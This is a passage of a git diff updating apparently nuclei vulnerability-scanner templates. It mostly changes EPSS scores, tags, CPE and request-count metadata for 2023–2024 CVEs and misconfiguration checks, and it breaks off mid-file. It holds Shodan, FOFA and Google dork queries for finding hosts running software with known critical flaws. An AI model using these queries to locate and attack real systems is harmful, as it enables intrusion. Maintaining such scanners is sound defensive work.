b/http/cves/2023/CVE-2023-4634.yaml @@ -20,8 +20,8 @@ info: cvss-score: 9.8 cve-id: CVE-2023-4634 cwe-id: CWE-73 - epss-score: 0.01945 - epss-percentile: 0.87359 + epss-score: 0.0217 + epss-percentile: 0.88199 cpe: cpe:2.3:a:davidlingren:media_library_assistant:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-46574.yaml b/http/cves/2023/CVE-2023-46574.yaml index 3d4083cdea..59a135c0a8 100644 --- a/http/cves/2023/CVE-2023-46574.yaml +++ b/http/cves/2023/CVE-2023-46574.yaml @@ -14,19 +14,17 @@ info: cvss-score: 9.8 cve-id: CVE-2023-46574 cwe-id: CWE-77 + cpe: cpe:2.3:o:totolink:a3700r_firmware:9.1.2u.6165_20211012:*:*:*:*:*:*:* epss-score: 0.00223 epss-percentile: 0.60602 - cpe: cpe:2.3:o:totolink:a3700r_firmware:9.1.2u.6165_20211012:*:*:*:*:*:*:* metadata: - max-request: 1 - verified: true + max-request: 2 + product: a3700r_firmware shodan-query: title:"Totolink" vendor: totolink - product: a3700r_firmware + verified: true tags: cve,cve2023,totolink,router,iot,rce -flow: http(1) && http(2) - http: - method: GET path: diff --git a/http/cves/2023/CVE-2023-46747.yaml b/http/cves/2023/CVE-2023-46747.yaml index 418e182a11..62d8b19aa4 100644 --- a/http/cves/2023/CVE-2023-46747.yaml +++ b/http/cves/2023/CVE-2023-46747.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2023-46747 cwe-id: CWE-288 epss-score: 0.96553 - epss-percentile: 0.99507 + epss-percentile: 0.99522 cpe: cpe:2.3:a:f5:big-ip_access_policy_manager:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-4714.yaml b/http/cves/2023/CVE-2023-4714.yaml index 587bdcd371..0dbb6021b9 100644 --- a/http/cves/2023/CVE-2023-4714.yaml +++ b/http/cves/2023/CVE-2023-4714.yaml @@ -18,8 +18,8 @@ info: cvss-score: 7.5 cve-id: CVE-2023-4714 cwe-id: CWE-200 - epss-score: 0.02131 - epss-percentile: 0.88024 + epss-score: 0.02512 + epss-percentile: 0.89027 cpe: cpe:2.3:a:playtube:playtube:3.0.1:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-47246.yaml b/http/cves/2023/CVE-2023-47246.yaml index 2fec127f18..6567792e92 100644 --- a/http/cves/2023/CVE-2023-47246.yaml +++ b/http/cves/2023/CVE-2023-47246.yaml @@ -19,8 +19,8 @@ info: cvss-score: 9.8 cve-id: CVE-2023-47246 cwe-id: CWE-22 - epss-score: 0.66797 - epss-percentile: 0.97622 + epss-score: 0.6752 + epss-percentile: 0.97659 cpe: cpe:2.3:a:sysaid:sysaid_on-premises:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-49070.yaml b/http/cves/2023/CVE-2023-49070.yaml index cecd466fbe..9c9f35bc47 100644 --- a/http/cves/2023/CVE-2023-49070.yaml +++ b/http/cves/2023/CVE-2023-49070.yaml @@ -18,8 +18,8 @@ info: cvss-score: 9.8 cve-id: CVE-2023-49070 cwe-id: CWE-94 - epss-score: 0.437 - epss-percentile: 0.97007 + epss-score: 0.59066 + epss-percentile: 0.97445 cpe: cpe:2.3:a:apache:ofbiz:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2023/CVE-2023-49103.yaml b/http/cves/2023/CVE-2023-49103.yaml index b9d3af2979..531621540e 100644 --- a/http/cves/2023/CVE-2023-49103.yaml +++ b/http/cves/2023/CVE-2023-49103.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2023-49103 cwe-id: CWE-200 epss-score: 0.51754 - epss-percentile: 0.97253 + epss-percentile: 0.97272 cpe: cpe:2.3:a:owncloud:graph_api:0.2.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-4966.yaml b/http/cves/2023/CVE-2023-4966.yaml index 7b081ed6cc..df976a1d0e 100644 --- a/http/cves/2023/CVE-2023-4966.yaml +++ b/http/cves/2023/CVE-2023-4966.yaml @@ -17,8 +17,8 @@ info: cvss-score: 7.5 cve-id: CVE-2023-4966 cwe-id: CWE-119,NVD-CWE-noinfo - epss-score: 0.92267 - epss-percentile: 0.98723 + epss-score: 0.92522 + epss-percentile: 0.98793 cpe: cpe:2.3:a:citrix:netscaler_application_delivery_controller:*:*:*:*:fips:*:*:* metadata: verified: "true" diff --git a/http/cves/2023/CVE-2023-4974.yaml b/http/cves/2023/CVE-2023-4974.yaml index da0e551126..804c049d6b 100644 --- a/http/cves/2023/CVE-2023-4974.yaml +++ b/http/cves/2023/CVE-2023-4974.yaml @@ -17,8 +17,8 @@ info: cvss-score: 9.8 cve-id: CVE-2023-4974 cwe-id: CWE-89 - epss-score: 0.01622 - epss-percentile: 0.8607 + epss-score: 0.01914 + epss-percentile: 0.87302 cpe: cpe:2.3:a:creativeitem:academy_lms:6.2:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-5074.yaml b/http/cves/2023/CVE-2023-5074.yaml index 058e084788..c81e42ccb2 100644 --- a/http/cves/2023/CVE-2023-5074.yaml +++ b/http/cves/2023/CVE-2023-5074.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2023-5074 cwe-id: CWE-798 epss-score: 0.01816 - epss-percentile: 0.86796 + epss-percentile: 0.86839 cpe: cpe:2.3:a:dlink:d-view_8:2.0.1.28:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-50917.yaml b/http/cves/2023/CVE-2023-50917.yaml index a8fbd88b73..46251d9831 100644 --- a/http/cves/2023/CVE-2023-50917.yaml +++ b/http/cves/2023/CVE-2023-50917.yaml @@ -17,17 +17,17 @@ info: cvss-score: 9.8 cve-id: CVE-2023-50917 cwe-id: CWE-77 - epss-score: 0.00104 - epss-percentile: 0.41924 + epss-score: 0.02327 + epss-percentile: 0.88616 cpe: cpe:2.3:a:mjdm:majordomo:*:*:*:*:*:*:*:* metadata: - max-request: 1 verified: true + max-request: 1 vendor: mjdm product: majordomo shodan-query: http.favicon.hash:1903390397 fofa-query: app="MajordomoSL" - tags: cve,cve2023,majordomo,rce,os + tags: packetstorm,seclists,cve,cve2023,majordomo,rce,os http: - method: GET diff --git a/http/cves/2023/CVE-2023-50968.yaml b/http/cves/2023/CVE-2023-50968.yaml index d66ef850ab..e25e546258 100644 --- a/http/cves/2023/CVE-2023-50968.yaml +++ b/http/cves/2023/CVE-2023-50968.yaml @@ -10,20 +10,24 @@ info: - https://lists.apache.org/thread/x5now4bk3llwf3k58kl96qvtjyxwp43q - http://www.openwall.com/lists/oss-security/2023/12/26/2 - https://nvd.nist.gov/vuln/detail/CVE-2023-50968 + - https://issues.apache.org/jira/browse/OFBIZ-12875 + - https://ofbiz.apache.org/download.html classification: - cwe-id: CWE-200 + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 cve-id: CVE-2023-50968 - epss-score: 0.0006 - epss-percentile: 0.23746 + cwe-id: CWE-918,CWE-200 + epss-score: 0.32266 + epss-percentile: 0.966 + cpe: cpe:2.3:a:apache:ofbiz:*:*:*:*:*:*:*:* metadata: - max-request: 4 verified: true - shodan-query: html:"OFBiz" - fofa-query: app="Apache_OFBiz" + max-request: 4 vendor: apache product: ofbiz + shodan-query: html:"OFBiz" + fofa-query: app="Apache_OFBiz" tags: cve,cve2023,apache,ofbiz,ssrf - variables: str: "{{rand_base(6)}}" diff --git a/http/cves/2023/CVE-2023-51467.yaml b/http/cves/2023/CVE-2023-51467.yaml index a25b599774..c80ed219c1 100644 --- a/http/cves/2023/CVE-2023-51467.yaml +++ b/http/cves/2023/CVE-2023-51467.yaml @@ -11,10 +11,15 @@ info: - https://www.openwall.com/lists/oss-security/2023/12/26/3 - https://twitter.com/_0xf4n9x_/status/1740202435367543183 - https://nvd.nist.gov/vuln/detail/CVE-2023-51467 + - https://issues.apache.org/jira/browse/OFBIZ-12873 classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 cve-id: CVE-2023-51467 - epss-score: 0.00045 - epss-percentile: 0.12546 + cwe-id: CWE-918 + epss-score: 0.54475 + epss-percentile: 0.97341 + cpe: cpe:2.3:a:apache:ofbiz:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: apache diff --git a/http/cves/2023/CVE-2023-5244.yaml b/http/cves/2023/CVE-2023-5244.yaml index cc71849ee4..ddcf86f99a 100644 --- a/http/cves/2023/CVE-2023-5244.yaml +++ b/http/cves/2023/CVE-2023-5244.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2023-5244 cwe-id: CWE-79 epss-score: 0.00064 - epss-percentile: 0.26237 + epss-percentile: 0.26129 cpe: cpe:2.3:a:microweber:microweber:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-5360.yaml b/http/cves/2023/CVE-2023-5360.yaml index e3c14fb6d0..75fffdd50a 100644 --- a/http/cves/2023/CVE-2023-5360.yaml +++ b/http/cves/2023/CVE-2023-5360.yaml @@ -18,8 +18,8 @@ info: cvss-score: 9.8 cve-id: CVE-2023-5360 cwe-id: CWE-434 - epss-score: 0.96872 - epss-percentile: 0.99629 + epss-score: 0.96723 + epss-percentile: 0.99581 cpe: cpe:2.3:a:royal-elementor-addons:royal_elementor_addons:*:*:*:*:*:wordpress:*:* metadata: verified: "true" @@ -28,7 +28,7 @@ info: product: royal_elementor_addons framework: wordpress publicwww-query: "/plugins/royal-elementor-addons/" - tags: cve,cve2023,rce,wpscan,wordpress,wp-plugin,wp,royal-elementor-addons,unauth,intrusive + tags: wpscan,packetstorm,cve,cve2023,rce,wordpress,wp-plugin,wp,royal-elementor-addons,unauth,intrusive variables: file: "{{to_lower(rand_text_alpha(5))}}" diff --git a/http/cves/2023/CVE-2023-5375.yaml b/http/cves/2023/CVE-2023-5375.yaml index 719c94c6ec..07ad19f4db 100644 --- a/http/cves/2023/CVE-2023-5375.yaml +++ b/http/cves/2023/CVE-2023-5375.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2023-5375 cwe-id: CWE-601 epss-score: 0.00083 - epss-percentile: 0.34429 + epss-percentile: 0.34359 cpe: cpe:2.3:a:mosparo:mosparo:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-5556.yaml b/http/cves/2023/CVE-2023-5556.yaml index b414fa1b9a..23a46d68e4 100644 --- a/http/cves/2023/CVE-2023-5556.yaml +++ b/http/cves/2023/CVE-2023-5556.yaml @@ -16,8 +16,8 @@ info: cvss-score: 6.1 cve-id: CVE-2023-5556 cwe-id: CWE-79 - epss-score: 0.0007 - epss-percentile: 0.28947 + epss-score: 0.00064 + epss-percentile: 0.26129 cpe: cpe:2.3:a:structurizr:on-premises_installation:*:*:*:*:*:*:*:* metadata: max-request: 5 @@ -25,7 +25,6 @@ info: product: on-premises_installation shodan-query: http.favicon.hash:1199592666 tags: cve,cve2023,xss,structurizr,oos,authenticated - variables: str: "{{randstr}}" diff --git a/http/cves/2023/CVE-2023-6018.yaml b/http/cves/2023/CVE-2023-6018.yaml index 17dcc1b89d..4d985c8ea7 100644 --- a/http/cves/2023/CVE-2023-6018.yaml +++ b/http/cves/2023/CVE-2023-6018.yaml @@ -15,7 +15,7 @@ info: cve-id: CVE-2023-6018 cwe-id: CWE-78 epss-score: 0.87111 - epss-percentile: 0.98325 + epss-percentile: 0.98361 cpe: cpe:2.3:a:lfprojects:mlflow:-:*:*:*:*:*:*:* metadata: verified: true @@ -24,7 +24,6 @@ info: product: mlflow shodan-query: http.title:"mlflow" tags: cve,cve2023,mlflow,oss,rce,intrusive - variables: model_name: "{{rand_text_alpha(6)}}" diff --git a/http/cves/2023/CVE-2023-6020.yaml b/http/cves/2023/CVE-2023-6020.yaml index f0366e485a..64d2e3f28f 100644 --- a/http/cves/2023/CVE-2023-6020.yaml +++ b/http/cves/2023/CVE-2023-6020.yaml @@ -13,9 +13,9 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2023-6020 - cwe-id: CWE-598,CWE-862 + cwe-id: CWE-862,CWE-598 epss-score: 0.04998 - epss-percentile: 0.9199 + epss-percentile: 0.92059 cpe: cpe:2.3:a:ray_project:ray:-:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-6021.yaml b/http/cves/2023/CVE-2023-6021.yaml index 18d860d7c5..dd6d293e54 100644 --- a/http/cves/2023/CVE-2023-6021.yaml +++ b/http/cves/2023/CVE-2023-6021.yaml @@ -15,7 +15,7 @@ info: cve-id: CVE-2023-6021 cwe-id: CWE-22,CWE-29 epss-score: 0.00481 - epss-percentile: 0.73122 + epss-percentile: 0.73273 cpe: cpe:2.3:a:ray_project:ray:-:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-6038.yaml b/http/cves/2023/CVE-2023-6038.yaml index 23f76e6835..5bd7d03518 100644 --- a/http/cves/2023/CVE-2023-6038.yaml +++ b/http/cves/2023/CVE-2023-6038.yaml @@ -13,17 +13,17 @@ info: classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 - cve-id: CVE-2010-1469 - cwe-id: CWE-29,CWE-862 - epss-score: 0.00084 - epss-percentile: 0.35105 + cve-id: CVE-2023-6038 + cwe-id: CWE-862,CWE-29 + epss-score: 0.04998 + epss-percentile: 0.92059 cpe: cpe:2.3:a:h2o:h2o:-:*:*:*:*:*:*:* metadata: - shodan-query: title:"H2O Flow" verified: true - max-request: 1 - product: h2o + max-request: 2 vendor: h2o + product: h2o + shodan-query: title:"H2O Flow" tags: cve,cve2023,h2o-3,h2o,ml http: diff --git a/http/cves/2023/CVE-2023-6063.yaml b/http/cves/2023/CVE-2023-6063.yaml index d70b4a18b9..7b55ad4f8a 100644 --- a/http/cves/2023/CVE-2023-6063.yaml +++ b/http/cves/2023/CVE-2023-6063.yaml @@ -6,30 +6,29 @@ info: severity: high description: | The WP Fastest Cache WordPress plugin before 1.2.2 does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by unauthenticated users. - remediation: Fixed in 1.2.2 reference: - https://wpscan.com/blog/unauthenticated-sql-injection-vulnerability-addressed-in-wp-fastest-cache-1-2-2/ - https://wordpress.org/plugins/wp-fastest-cache/ - https://github.com/motikan2010/CVE-2023-6063-PoC - https://nvd.nist.gov/vuln/detail/CVE-2023-6063 - https://wpscan.com/vulnerability/30a74105-8ade-4198-abe2-1c6f2967443e/ + remediation: Fixed in 1.2.2 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2023-6063 cwe-id: CWE-89 + cpe: cpe:2.3:a:wpfastestcache:wp_fastest_cache:*:*:*:*:*:wordpress:*:* epss-score: 0.00159 epss-percentile: 0.52296 - cpe: cpe:2.3:a:wpfastestcache:wp_fastest_cache:*:*:*:*:*:wordpress:*:* metadata: - vendor: wpfastestcache - product: wp_fastest_cache framework: wordpress - publicwww-query: "/wp-content/plugins/wp-fastest-cache/" + max-request: 2 + product: wp_fastest_cache + publicwww-query: /wp-content/plugins/wp-fastest-cache/ + vendor: wpfastestcache tags: cve,cve2023,wp-fastest-cache,wpscan,wordpress,wp-plugin -flow: http(1) && http(2) - http: - method: GET path: diff --git a/http/cves/2023/CVE-2023-6379.yaml b/http/cves/2023/CVE-2023-6379.yaml index b6cc8a9d47..8a7a929f02 100644 --- a/http/cves/2023/CVE-2023-6379.yaml +++ b/http/cves/2023/CVE-2023-6379.yaml @@ -6,23 +6,25 @@ info: severity: medium description: | Cross-site scripting (XSS) vulnerability in Alkacon Software Open CMS, affecting versions 14 and 15 of the 'Mercury' template. - impact: | - Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to potential session hijacking, defacement, or theft of sensitive information. remediation: | Update to version OpenCMS 16 reference: - https://www.incibe.es/incibe-cert/alerta-temprana/vulnerabilidades/cve-2023-6379 - https://nvd.nist.gov/vuln/detail/CVE-2023-6379 + - https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-alkacon-software-opencms classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2023-6379 cwe-id: CWE-79 + epss-score: 0.00113 + epss-percentile: 0.44565 + cpe: cpe:2.3:a:alkacon:opencms:*:*:*:*:*:*:*:* metadata: verified: true - max-request: 2 + max-request: 11 vendor: alkacon - product: OpenCms + product: opencms shodan-query: title:"opencms" tags: cve,cve2023,opencms,xss,alkacon diff --git a/http/cves/2023/CVE-2023-6380.yaml b/http/cves/2023/CVE-2023-6380.yaml index 07c6bb8900..dc1066c85b 100644 --- a/http/cves/2023/CVE-2023-6380.yaml +++ b/http/cves/2023/CVE-2023-6380.yaml @@ -12,10 +12,16 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2023-6380 + cwe-id: CWE-601 + epss-score: 0.01158 + epss-percentile: 0.83309 + cpe: cpe:2.3:a:alkacon:opencms:*:*:*:*:*:*:*:* metadata: - max-request: 1 - shodan-query: "/opencms/" verified: true + max-request: 1 + vendor: alkacon + product: opencms + shodan-query: "/opencms/" tags: cve,cve2023,redirect,opencms http: diff --git a/http/cves/2023/CVE-2023-6553.yaml b/http/cves/2023/CVE-2023-6553.yaml index c2397129fe..edc0b106a2 100644 --- a/http/cves/2023/CVE-2023-6553.yaml +++ b/http/cves/2023/CVE-2023-6553.yaml @@ -14,12 +14,11 @@ info: cvss-score: 9.8 cve-id: CVE-2023-6553 metadata: - publicwww-query: /wp-content/plugins/backup-backup/ google-query: inurl:"/wp-content/plugins/backup-backup/" + max-request: 2 + publicwww-query: /wp-content/plugins/backup-backup/ tags: cve,cve2023,wp-plugin,rce,unauth,wordpress,wp -flow: http(1) && http(2) - http: - method: GET path: diff --git a/http/cves/2023/CVE-2023-6623.yaml b/http/cves/2023/CVE-2023-6623.yaml index 8865a6a16f..392afbbad7 100644 --- a/http/cves/2023/CVE-2023-6623.yaml +++ b/http/cves/2023/CVE-2023-6623.yaml @@ -19,10 +19,10 @@ info: cvss-score: 7.5 cve-id: CVE-2023-6623 metadata: - max-request: 2 verified: true + max-request: 2 publicwww-query: "/wp-content/plugins/essential-blocks/" - tags: cve,cve2023,wp,wp-plugin,wordpress,essential-blocks,lfi + tags: wpscan,cve,cve2023,wp,wp-plugin,wordpress,essential-blocks,lfi http: - method: GET diff --git a/http/cves/2023/CVE-2023-7028.yaml b/http/cves/2023/CVE-2023-7028.yaml index b555b28ec3..3e464520ee 100644 --- a/http/cves/2023/CVE-2023-7028.yaml +++ b/http/cves/2023/CVE-2023-7028.yaml @@ -18,15 +18,11 @@ info: cwe-id: CWE-284 metadata: verified: true - max-request: 2 + max-request: 6 vendor: gitlab product: gitlab shodan-query: title:"Gitlab" - tags: cve,cve2023,gitlab,auth-bypass,intrusive -flow: | - http(1); - set("token", template["token"][0]); - http(2); + tags: hackerone,cve,cve2023,gitlab,auth-bypass,intrusive http: - raw: diff --git a/http/cves/2024/CVE-2024-0352.yaml b/http/cves/2024/CVE-2024-0352.yaml index 84178d4fb9..d733af9536 100644 --- a/http/cves/2024/CVE-2024-0352.yaml +++ b/http/cves/2024/CVE-2024-0352.yaml @@ -11,18 +11,20 @@ info: remediation: Update to the latest version reference: - https://nvd.nist.gov/vuln/detail/CVE-2024-0352 + - https://note.zhaoj.in/share/ciwYj7QXC4sZ + - https://vuldb.com/?ctiid.250120 + - https://vuldb.com/?id.250120 classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L/E:P/RL:X/RC:R + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L cvss-score: 7.3 cve-id: CVE-2024-0352 cwe-id: CWE-434 metadata: verified: true max-request: 1 - shodan-query: http.favicon.hash:874152924 vendor: likeshop - tags: cve,cve2024,rce,file-upload,likeshop,instrusive - + shodan-query: http.favicon.hash:874152924 + tags: cve,cve2024,rce,file-upload,likeshop,instrusive,intrusive variables: filename: "{{rand_base(6)}}" diff --git a/http/default-logins/camunda/camunda-default-login.yaml b/http/default-logins/camunda/camunda-default-login.yaml index 07df15e57e..72549d30e8 100644 --- a/http/default-logins/camunda/camunda-default-login.yaml +++ b/http/default-logins/camunda/camunda-default-login.yaml @@ -14,6 +14,7 @@ info: cwe-id: CWE-522 metadata: verified: true + max-request: 2 shodan-query: http.html:"Camunda Welcome" tags: default-login,camunda diff --git a/http/exposed-panels/onlyoffice-login-panel.yaml b/http/exposed-panels/onlyoffice-login-panel.yaml index 22f81bad71..9174be550f 100644 --- a/http/exposed-panels/onlyoffice-login-panel.yaml +++ b/http/exposed-panels/onlyoffice-login-panel.yaml @@ -7,8 +7,8 @@ info: description: | ONLYOFFICE Community Server is a free open-source collaborative system developed to manage documents, projects, customer relationship and email correspondence. metadata: - max-request: 1 verified: true + max-request: 2 fofa-query: app="ONLYOFFICE" && (icon_hash="1928933157" || icon_hash="826083956" || icon_hash="-1380930248" || icon_hash="-285544629" || icon_hash="812741391") tags: panel,onlyoffice,detect diff --git a/http/exposed-panels/vue-pacs-panel.yaml b/http/exposed-panels/vue-pacs-panel.yaml index 7cd7e15e1a..9c5de25ff3 100644 --- a/http/exposed-panels/vue-pacs-panel.yaml +++ b/http/exposed-panels/vue-pacs-panel.yaml @@ -9,8 +9,8 @@ info: reference: - https://www.usa.philips.com/healthcare/solutions/diagnostic-informatics/enterprise-imaging-pacs metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: http.title:"Vue PACS" tags: vue,pacs,panel,login diff --git a/http/exposed-panels/woodwing-panel.yaml b/http/exposed-panels/woodwing-panel.yaml index f7d8a8ba45..6967ab2622 100644 --- a/http/exposed-panels/woodwing-panel.yaml +++ b/http/exposed-panels/woodwing-panel.yaml @@ -7,6 +7,7 @@ info: reference: - https://twitter.com/ynsmroztas/status/1680961398011047936 metadata: + max-request: 2 shodan-query: http.title:"WoodWing Studio Server" fofa-query: title=="WoodWing Studio Server" tags: woodwing,panel diff --git a/http/exposures/backups/zip-backup-files.yaml b/http/exposures/backups/zip-backup-files.yaml index ae605013fc..d474352086 100644 --- a/http/exposures/backups/zip-backup-files.yaml +++ b/http/exposures/backups/zip-backup-files.yaml @@ -10,7 +10,7 @@ info: cvss-score: 5.3 cwe-id: CWE-200 metadata: - max-request: 625 + max-request: 650 tags: exposure,backup http: diff --git a/http/exposures/docker-daemon-exposed.yaml b/http/exposures/docker-daemon-exposed.yaml index 857e0c35fb..93e35e8ff2 100644 --- a/http/exposures/docker-daemon-exposed.yaml +++ b/http/exposures/docker-daemon-exposed.yaml @@ -7,10 +7,10 @@ info: description: | Docker Daemon exposed on the network map can help remote attacker to gain access to the Docker containers and potentially the host system. metadata: - max-request: 1 + verified: true + max-request: 2 shodan-query: port:2375 product:"docker" fofa-query: app="docker-Daemon" && port="2375" - verified: true tags: docker,exposure,misconfig http: diff --git a/http/misconfiguration/apache/apache-server-status.yaml b/http/misconfiguration/apache/apache-server-status.yaml index 98d1fd9fd7..c58ae70459 100644 --- a/http/misconfiguration/apache/apache-server-status.yaml +++ b/http/misconfiguration/apache/apache-server-status.yaml @@ -5,14 +5,14 @@ info: author: thabisocn severity: low description: | - Apache /server-status displays information about your Apache status. If you are not using this feature, disable it. + Apache /server-status displays information about your Apache status. If you are not using this feature, disable it. reference: - https://www.exploit-db.com/ghdb/5548 - https://www.invicti.com/web-vulnerability-scanner/vulnerabilities/apache-server-status-detected/ - https://www.acunetix.com/vulnerabilities/web/apache-server-status-detected/ metadata: - max-request: 2 verified: true + max-request: 2 google-Dork: - site:*/server-status intext:"Apache server status for" - site:*/server-info intext:"Apache server Information" diff --git a/http/misconfiguration/aws/cdn-cache-poisoning.yaml b/http/misconfiguration/aws/cdn-cache-poisoning.yaml index 9909c511a4..c7bb72f2d7 100644 --- a/http/misconfiguration/aws/cdn-cache-poisoning.yaml +++ b/http/misconfiguration/aws/cdn-cache-poisoning.yaml @@ -6,15 +6,13 @@ info: severity: unknown description: | When the X-Amz-Server-Side-Encryption header is sent with user controlled value, it can lead to a misconfigured CDN cache response with a 400 status code, making the page inaccessible. - impact: | - This vulnerability can disrupt website availability by poisoning the CDN cache, potentially leading to denial of service for users trying to access the page. reference: - https://portswigger.net/web-security/web-cache-poisoning metadata: verified: true - shodan-query: "X-Amz-Server-Side-Encryption" + max-request: 2 + shodan-query: X-Amz-Server-Side-Encryption tags: cache,aws,poisoning,cdn - variables: string: "{{to_lower(rand_base(8))}}={{to_lower(rand_base(8))}}" diff --git a/http/misconfiguration/gitlab/gitlab-public-signup.yaml b/http/misconfiguration/gitlab/gitlab-public-signup.yaml index 93bd513de2..0eb1781d3c 100644 --- a/http/misconfiguration/gitlab/gitlab-public-signup.yaml +++ b/http/misconfiguration/gitlab/gitlab-public-signup.yaml @@ -5,7 +5,7 @@ info: author: pdteam,axrk severity: info metadata: - max-request: 1 + max-request: 2 shodan-query: http.title:"GitLab" tags: gitlab,misconfig diff --git a/http/misconfiguration/h2o/h2o-arbitary-file-read.yaml b/http/misconfiguration/h2o/h2o-arbitary-file-read.yaml index 7dbebff007..954dfb0f4b 100644 --- a/http/misconfiguration/h2o/h2o-arbitary-file-read.yaml +++ b/http/misconfiguration/h2o/h2o-arbitary-file-read.yaml @@ -11,9 +11,9 @@ info: classification: cwe-id: CWE-200 metadata: - shodan-query: title:"H2O Flow" verified: true max-request: 1 + shodan-query: title:"H2O Flow" tags: h2o-3,h2o,info-leak,lfi http: diff --git a/http/misconfiguration/h2o/h2o-dashboard.yaml b/http/misconfiguration/h2o/h2o-dashboard.yaml index e1aa186d7d..5350c830a8 100644 --- a/http/misconfiguration/h2o/h2o-dashboard.yaml +++ b/http/misconfiguration/h2o/h2o-dashboard.yaml @@ -7,8 +7,8 @@ info: description: | H2o dashboard by default has no authentication and can lead to RCE on the host. metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: title:"H2O Flow" tags: misconfig,exposure,h2o,ml,unauth diff --git a/http/misconfiguration/installer/espocrm-installer.yaml b/http/misconfiguration/installer/espocrm-installer.yaml index 90c727c91b..c7b0ba5ac6 100644 --- a/http/misconfiguration/installer/espocrm-installer.yaml +++ b/http/misconfiguration/installer/espocrm-installer.yaml @@ -6,8 +6,8 @@ info: severity: high description: Espocrm is susceptible to the Installation page exposure due to misconfiguration. metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: html:"Welcome to Espocrm" tags: misconfig,espocrm,install,exposure diff --git a/http/misconfiguration/mixed-active-content.yaml b/http/misconfiguration/mixed-active-content.yaml index 06b549362a..45c29ba282 100644 --- a/http/misconfiguration/mixed-active-content.yaml +++ b/http/misconfiguration/mixed-active-content.yaml @@ -11,8 +11,8 @@ info: - https://portswigger.net/kb/issues/01000400_mixed-content - https://resources.infosecinstitute.com/topics/vulnerabilities/https-mixed-content-vulnerability/ - https://docs.gitlab.com/ee/user/application_security/dast/checks/319.1.html - impact: | - Loading third-party scripts over HTTP can expose sensitive user data and lead to potential security vulnerabilities. + metadata: + max-request: 1 tags: misconfig http: diff --git a/http/misconfiguration/mixed-passive-content.yaml b/http/misconfiguration/mixed-passive-content.yaml index 7c08eae32e..2ed4c36d7a 100644 --- a/http/misconfiguration/mixed-passive-content.yaml +++ b/http/misconfiguration/mixed-passive-content.yaml @@ -11,8 +11,8 @@ info: - https://portswigger.net/kb/issues/01000400_mixed-content - https://resources.infosecinstitute.com/topics/vulnerabilities/https-mixed-content-vulnerability/ - https://docs.gitlab.com/ee/user/application_security/dast/checks/319.1.html - impact: | - Loading third-party scripts over HTTP can expose sensitive user data and lead to potential security vulnerabilities. + metadata: + max-request: 1 tags: misconfig http: diff --git a/http/misconfiguration/php/php-composer-binary.yaml b/http/misconfiguration/php/php-composer-binary.yaml index bc6e0b2a51..1c9207796f 100644 --- a/http/misconfiguration/php/php-composer-binary.yaml +++ b/http/misconfiguration/php/php-composer-binary.yaml @@ -9,8 +9,8 @@ info: remediation: | Restrict access to the PHP Composer binary by implementing proper access controls and permissions. metadata: - max-request: 1 verified: true + max-request: 1 tags: php,composer,exposure http: diff --git a/http/misconfiguration/woodwing-git.yaml b/http/misconfiguration/woodwing-git.yaml index 4f701c1528..9da08cbb07 100644 --- a/http/misconfiguration/woodwing-git.yaml +++ b/http/misconfiguration/woodwing-git.yaml @@ -7,6 +7,7 @@ info: reference: - https://twitter.com/ynsmroztas/status/1680961398011047936 metadata: + max-request: 2 shodan-query: http.title:"WoodWing Studio Server" fofa-query: title=="WoodWing Studio Server" tags: woodwing,git,config diff --git a/http/misconfiguration/woodwing-phpinfo.yaml b/http/misconfiguration/woodwing-phpinfo.yaml index 2cc72aa7a2..e1fa784348 100644 --- a/http/misconfiguration/woodwing-phpinfo.yaml +++ b/http/misconfiguration/woodwing-phpinfo.yaml @@ -7,6 +7,7 @@ info: reference: - https://twitter.com/ynsmroztas/status/1680961398011047936 metadata: + max-request: 2 shodan-query: http.title:"WoodWing Studio Server" fofa-query: title=="WoodWing Studio Server" tags: woodwing,phpinfo diff --git a/http/osint/piratebay.yaml b/http/osint/piratebay.yaml index 